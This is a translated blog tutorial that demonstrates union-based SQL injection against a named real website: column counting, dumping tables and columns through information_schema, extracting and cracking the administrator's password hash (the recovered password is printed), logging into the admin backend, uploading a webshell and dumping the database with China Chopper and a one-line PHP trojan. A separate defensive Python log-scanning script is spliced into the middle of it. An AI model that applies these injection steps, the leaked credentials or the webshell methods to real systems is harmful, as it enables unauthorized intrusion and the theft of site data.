PHP + MySQL hands-on shell tutorial
Note: this article is intended for those who do not yet fully understand injection!
Target site: http://www.51team.cn/
Injection point: http://www.51team.cn/newmess.php?id=138
Find the injection point and guess the number of columns. You can use order by 1, order by 2, ... to guess; when order by is not usable, use union to join queries instead!
Guessing gives 22 columns:
Next, bring out the display positions. Syntax: and 1=2 union select 1,2,3,4,5,...,22 (the number of columns must match!)
Press Enter to load the page, and the number 9 is displayed on it!
Now let's query the version, user name and database!
version(), database(), user(): to query each of these, replace the display position 9 that just appeared with the function.
That gives the version number; to query the user name, replace 9 in the browser with user().
This is what I found:
Version: 5.1.32-community
Database: 51teamcom
Username: 51teamcom (the database name and the user name are the same!)
Next, let's dump the tables. Syntax: from information_schema.tables where table_schema=database() limit 0,1
Change 9 to table_name and press Enter, and a table name appears. The first table is dede_addonarticle; we only need to find the administrator table!
Keep going. Each time one table has been dumped, increase the first number of the limit: limit 1,1 for the second table, limit 2,1 for the third, and so on; 0 is the first!
Here are the tables I dumped:
dede_addonproduct, dede_admin, dede_admintype, role, dede_channeltype, role, dede_flink, dede_flinktype, role, dede_homepageset
A DedeCMS (织梦) site!
dede_admin should be the administrator table! Let's take a look!
Before dumping the columns, we need to convert dede_admin to a hexadecimal value, which is 646562135f61646d696e.
Syntax: from information_schema.columns where table_name=0x646562135f61646d696e limit 0,1. Same as before: the limit starts at 0 for the first column, the hexadecimal value we just converted goes after 0x, and the display position 9 is changed to column_name!
The columns I dumped: id, userid, pwd, uname, tname, email. pwd should be the password and uname the account. Let's try it!
and 1=2 union select 1,2,3,4,5,6,...,22 from dede_admin. Remove all the earlier syntax from the browser and keep only the injection point; that is all:
http://www.51team.cn/about.php?id=10 and 1=2 union select 1,2,3,4,5,6,...,22 from dede_admin, then press Enter!
Then replace 9 with the columns just dumped. I replaced it with uname and pwd in two browser windows!
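As an added example that is not part of the original post, the following Python script shows how a defender would recognise this request sequence (order by probing, a false condition plus union select, built-in probes, information_schema enumeration, hex-encoded table names) in a web server access log. The log lines, host and addresses are constructed, and the signature names and thresholds are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the technique described above: order-by column counting, a
# false condition plus UNION SELECT, built-in probes, information_schema
# enumeration and hex-encoded table names. Checked on the URL-decoded path.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("builtin_probe", re.compile(r"\b(?:version|user|database)\s*\(\s*\)", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{8,}\b", re.I)),
    ("tautology", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b", re.I)),
]
# Apache/Nginx common log format; only the request path is inspected.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def decode_path(path):
    # Decode twice so double-encoded payloads (%2520 -> %20 -> space) are not missed.
    return unquote_plus(unquote_plus(path))

def analyse_line(line):
    # Returns {ip, path, status, hits}; None when the line is not in common log format.
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_path(m.group("path"))
    return {"ip": m.group("ip"), "path": m.group("path"), "status": int(m.group("status")),
            "hits": [name for name, rx in SIGNATURES if rx.search(decoded)]}

def scan_log(lines, min_hits=1):
    # Records whose decoded path matched at least min_hits signatures, in log order.
    out = []
    for line in lines:
        rec = analyse_line(line)
        if rec and len(rec["hits"]) >= min_hits:
            out.append(rec)
    return out

# Constructed sample log (placeholder paths, RFC 5737 addresses) mirroring the
# request sequence in the article: baseline, ORDER BY probe, UNION with version(),
# information_schema.tables with LIMIT n,1, then columns by hex-encoded table name.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2013:10:01:02 +0800] "GET /newmess.php?id=138 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2013:10:01:09 +0800] "GET /newmess.php?id=138%20order%20by%2022 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2013:10:01:15 +0800] "GET /newmess.php?id=138%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,version(),10 HTTP/1.1" 200 4870
203.0.113.7 - - [10/Mar/2013:10:01:40 +0800] "GET /newmess.php?id=138%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,table_name,10%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1 HTTP/1.1" 200 4870
203.0.113.7 - - [10/Mar/2013:10:02:05 +0800] "GET /newmess.php?id=138%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,column_name,10%20from%20information_schema.columns%20where%20table_name=0x646564655f61646d696e%20limit%200,1 HTTP/1.1" 200 4870
198.51.100.4 - - [10/Mar/2013:10:02:30 +0800] "GET /about.php?id=10 HTTP/1.1" 200 3300
""".splitlines()
```

Raising min_hits reduces noise from legitimate pages that happen to contain one keyword, while the multi-signature requests from one address are the sequence worth alerting on.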
The user is admin and the password hash is d9d2b2de067864194059. The hash can be looked up at cmd5.com.
The password has been recovered: it is bx2013. Next, find the admin backend. You can use a tool or Google to find it! I found:
http://www.51team.cn/web_admin/login.php
Login successful:
Now just find an upload point and upload the webshell; upload a txt file first to test. Hey hey! http://www.51team.cn/a.txt
Next, dump the database (脱裤)!
You can upload a database dump script along with the webshell, or use China Chopper (菜刀). I will use Chopper for convenience: put a one-line PHP shell (一句话木马) into a PHP file!
OK, connected.
If you are using a full web shell instead, you have to read the database user name and password from the site's configuration file, conn.php!
After connecting, open the site list, right-click the site and choose database management. A window opens showing the database!
This article is from the "lei" blog